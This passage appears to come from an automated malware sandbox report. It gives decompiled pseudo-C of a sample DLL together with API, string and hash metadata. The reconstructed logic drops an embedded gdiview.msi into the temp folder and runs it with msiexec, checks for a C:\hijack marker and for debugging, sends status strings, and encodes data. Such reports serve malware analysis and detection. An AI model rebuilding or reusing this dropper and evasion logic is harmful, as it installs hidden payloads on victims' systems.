                                                                                                                                                                  											_v2156 = _v2156 - 1;
                                                                                                                                                                  											_v2148 = 0x8007007a;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  									L18:
                                                                                                                                                                  									 *_v2156 = 0;
                                                                                                                                                                  									if(_v2148 < 0) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										goto L24;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L25;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                                                  									goto L17;
                                                                                                                                                                  								} else {
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							L25:
                                                                                                                                                                  							CloseHandle(_v32);
                                                                                                                                                                  							_v20 = _v24;
                                                                                                                                                                  							goto L26;
                                                                                                                                                                  						}
                                                                                                                                                                  						L24:
                                                                                                                                                                  						_v2136 = 1;
                                                                                                                                                                  						goto L25;
                                                                                                                                                                  					}
                                                                                                                                                                  					L26:
                                                                                                                                                                  					_v20 =  &(_v20->Internal);
                                                                                                                                                                  					_v24 = _v20;
                                                                                                                                                                  				} while (_v20 < 0x10);
                                                                                                                                                                  				return _v2136;
                                                                                                                                                                  			}

































                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D5F1
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D645
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D6C0
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001D802
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                                  • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                  • API String ID: 3873020565-153650326
                                                                                                                                                                  • Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
                                                                                                                                                                  • Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                  				intOrPtr _v172;
                                                                                                                                                                  				intOrPtr _v176;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				void* _t81;
                                                                                                                                                                  
                                                                                                                                                                  				_t74 = __esi;
                                                                                                                                                                  				_t73 = __edi;
                                                                                                                                                                  				_t57 = __ebx;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                                  				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                                  				E1000CF80(__edi, _v168, 0, 0x21);
                                                                                                                                                                  				E1000CF80(_t73, _v176, 0, 0x10);
                                                                                                                                                                  				_t67 = _a4;
                                                                                                                                                                  				_t36 = E1000CAD0(_a4);
                                                                                                                                                                  				_t80 = _t75 + 0x24;
                                                                                                                                                                  				if(_t36 <= 0) {
                                                                                                                                                                  					E1000E2E0(_v168, "00000000000000000000000000000000");
                                                                                                                                                                  					_t81 = _t80 + 8;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E1001BC70( &_v164);
                                                                                                                                                                  					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
                                                                                                                                                                  					_t67 =  &_v164;
                                                                                                                                                                  					E1001CC20( &_v164, _v176);
                                                                                                                                                                  					_t81 = _t80 + 0x1c;
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  					while(_v8 < 0x10) {
                                                                                                                                                                  						_t67 = _v168 + _v8 * 2;
                                                                                                                                                                  						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
                                                                                                                                                                  						_t81 = _t81 + 0xc;
                                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_v176);
                                                                                                                                                                  				E1000CA40(_t57, _t73, _t74, __eflags);
                                                                                                                                                                  				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
                                                                                                                                                                  				E1000CF80(_t73, _v172, 0, 0x11);
                                                                                                                                                                  				__eflags = _v168 + 8;
                                                                                                                                                                  				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
                                                                                                                                                                  				_push(_v168);
                                                                                                                                                                  				E1000CA40(_t57, _t73, _t74, __eflags);
                                                                                                                                                                  				return _v172;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                                  • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                                  • API String ID: 796335831-606320477
                                                                                                                                                                  • Opcode ID: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
                                                                                                                                                                  • Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
                                                                                                                                                                  • Opcode Fuzzy Hash: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
                                                                                                                                                                  • Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FCD0(void* __edi, void* __eflags) {
                                                                                                                                                                  				char _v1027;
                                                                                                                                                                  				char _v1028;
                                                                                                                                                                  				char _v1291;
                                                                                                                                                                  				char _v1292;
                                                                                                                                                                  				int _t21;
                                                                                                                                                                  
                                                                                                                                                                  				_t29 = __edi;
                                                                                                                                                                  				_v1292 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v1291, 0, 0x103);
                                                                                                                                                                  				_v1028 = 0;
                                                                                                                                                                  				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
                                                                                                                                                                  				GetTempPathA(0x104,  &_v1292);
                                                                                                                                                                  				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
                                                                                                                                                                  				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
                                                                                                                                                                  				E1001FC70( &_v1292, 0x10027948, 0x39e00);
                                                                                                                                                                  				_t21 = PathFileExistsA( &_v1292);
                                                                                                                                                                  				_t38 = _t21;
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					return E1001A230(_t38,  &_v1028);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t21;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FCEE
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FD0B
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FD36
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FD51
                                                                                                                                                                    • Part of subcall function 1001FC70: CreateFileA.KERNEL32(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                    • Part of subcall function 1001FC70: WriteFile.KERNEL32(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                    • Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD79
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNEL32 ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                  • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                  • API String ID: 1459467440-729886463
                                                                                                                                                                  • Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
                                                                                                                                                                  • Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				intOrPtr _t51;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                                  				intOrPtr _t55;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  
                                                                                                                                                                  				_t62 = __eflags;
                                                                                                                                                                  				_t45 = __esi;
                                                                                                                                                                  				_t44 = __edi;
                                                                                                                                                                  				_t36 = __ebx;
                                                                                                                                                                  				E1001FE40();
                                                                                                                                                                  				E10020020(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.1", "51.0", "exe");
                                                                                                                                                                  				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                                  				_t37 = _t51;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                                  				E100202C0(__ebx, __edi, __esi, _t62);
                                                                                                                                                                  				_t52 = _t51 + 0x1c;
                                                                                                                                                                  				if(PathFileExistsA("C:\\hijack") != 0) {
                                                                                                                                                                  					L7:
                                                                                                                                                                  					_t53 = _t52 - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                                  					E100202C0(_t36, _t44, _t45, __eflags);
                                                                                                                                                                  					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
                                                                                                                                                                  					E1001FF30(_t36, _t44, _t45, __eflags);
                                                                                                                                                                  					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
                                                                                                                                                                  					E1001FE50(_t36, _t44, _t45, __eflags);
                                                                                                                                                                  					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                                  					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                                  					E100202C0(_t36, _t44, _t45, __eflags);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E1001A100();
                                                                                                                                                                  					if(E1001A110(_t37) == 0 || E10019D70() != 0) {
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0);
                                                                                                                                                                  						_t52 = _t52 + 8;
                                                                                                                                                                  						__eflags = _t35;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							goto L7;
                                                                                                                                                                  						} else {
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				E1001A2C0();
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                                  				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t47 - 0x28);
                                                                                                                                                                  				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                                  				return _t31;
                                                                                                                                                                  			}













                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(C:\hijack), ref: 100207D2
                                                                                                                                                                    • Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                  • String ID: -0.1$51.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                                  • API String ID: 482051434-2164037247
                                                                                                                                                                  • Opcode ID: 73aec12ebb7ad2b35c583a1e9a4c5317c2f3ee5c586dd5546575d5ecf4528954
                                                                                                                                                                  • Instruction ID: 9599716a8016536e2dc487c9b8d22fe1c18f1641b674e0e16c19d2f9c65c59e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 73aec12ebb7ad2b35c583a1e9a4c5317c2f3ee5c586dd5546575d5ecf4528954
                                                                                                                                                                  • Instruction Fuzzy Hash: B2018138D04309AED710EBA5AC4A6DD77A3EF51294F9401A9FA0467643EF31A5809AA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1002199A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				void* _t101;
                                                                                                                                                                  				void* _t154;
                                                                                                                                                                  				void* _t156;
                                                                                                                                                                  				void* _t158;
                                                                                                                                                                  				void* _t171;
                                                                                                                                                                  
                                                                                                                                                                  				L0:
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L0:
                                                                                                                                                                  					_t150 = __edi;
                                                                                                                                                                  					_t106 = __ebx;
                                                                                                                                                                  					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                                  					_t60 = E10002270(_t154 - 0xe2a4);
                                                                                                                                                                  					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                                  					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					L2:
                                                                                                                                                                  					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                                  					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                                  					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                                  					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                                  					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                                  					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                                  					_push(_t154 - 0x3d54);
                                                                                                                                                                  					_push(_t154 - 0xe294);
                                                                                                                                                                  					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                  					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  					_t171 = _t156 + 0x7c;
                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                  						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
                                                                                                                                                                  						_t171 = _t171 + 0x10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t101 = E1000CAD0(_t154 - 0x746c);
                                                                                                                                                                  					_t156 = _t171 + 4;
                                                                                                                                                                  					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  				}
                                                                                                                                                                  				L5:
                                                                                                                                                                  				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                                  				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                                  				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                                  				E10003090(_t154 - 0xe2a4);
                                                                                                                                                                  				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                                  				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                                  				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                                  				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                                  				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                  				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  				_t158 = _t156 + 0x20;
                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                  					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
                                                                                                                                                                  					_t158 = _t158 + 0x10;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                                  				return  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3854912713-0
                                                                                                                                                                  • Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				char _v292;
                                                                                                                                                                  				signed int _v296;
                                                                                                                                                                  				char _v300;
                                                                                                                                                                  				intOrPtr _v304;
                                                                                                                                                                  				char _v308;
                                                                                                                                                                  				intOrPtr _v312;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				char _t61;
                                                                                                                                                                  				char _t62;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                                  				char _t115;
                                                                                                                                                                  				char _t116;
                                                                                                                                                                  				signed int _t118;
                                                                                                                                                                  
                                                                                                                                                                  				_t132 = __esi;
                                                                                                                                                                  				_t131 = __edi;
                                                                                                                                                                  				_t101 = __ebx;
                                                                                                                                                                  				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                                  				_v24 = _t61;
                                                                                                                                                                  				_t102 =  *0x100264e4; // 0x32336c6c
                                                                                                                                                                  				_v20 = _t102;
                                                                                                                                                                  				_t115 =  *0x100264e8; // 0x0
                                                                                                                                                                  				_v16 = _t115;
                                                                                                                                                                  				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                                  				_v308 = _t62;
                                                                                                                                                                  				_t103 =  *0x100264f0; // 0x7265726f
                                                                                                                                                                  				_v304 = _t103;
                                                                                                                                                                  				_t116 =  *0x100264f4; // 0x0
                                                                                                                                                                  				_v300 = _t116;
                                                                                                                                                                  				E1000CF80(__edi,  &_v292, 0, 0x108);
                                                                                                                                                                  				E1001F1B0( &_v24,  &_v292,  &_v24);
                                                                                                                                                                  				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
                                                                                                                                                                  				_t118 = _a4;
                                                                                                                                                                  				_v12 = E1000CAD0(_t118);
                                                                                                                                                                  				_v296 = 0;
                                                                                                                                                                  				_t70 = _v12 & 0x80000007;
                                                                                                                                                                  				if(_t70 < 0) {
                                                                                                                                                                  					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t70 == 0) {
                                                                                                                                                                  					_t120 = _v12 + 8;
                                                                                                                                                                  					__eflags = _t120;
                                                                                                                                                                  					_v296 = _t120;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                  					_t120 = _t118 & 0x00000007;
                                                                                                                                                                  					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
                                                                                                                                                                  				E1000CF80(_t131, _v8, 0, _v296);
                                                                                                                                                                  				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
                                                                                                                                                                  				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                  				_t90 = _v296 + 2;
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
                                                                                                                                                                  				_push(_v8);
                                                                                                                                                                  				E1000CA40(_t101, _t131, _t132, _t90 % 3);
                                                                                                                                                                  				return _v312;
                                                                                                                                                                  			}

























                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen
                                                                                                                                                                  • String ID: explorer$rundll32
                                                                                                                                                                  • API String ID: 1975251954-2912785976
                                                                                                                                                                  • Opcode ID: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
                                                                                                                                                                  • Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
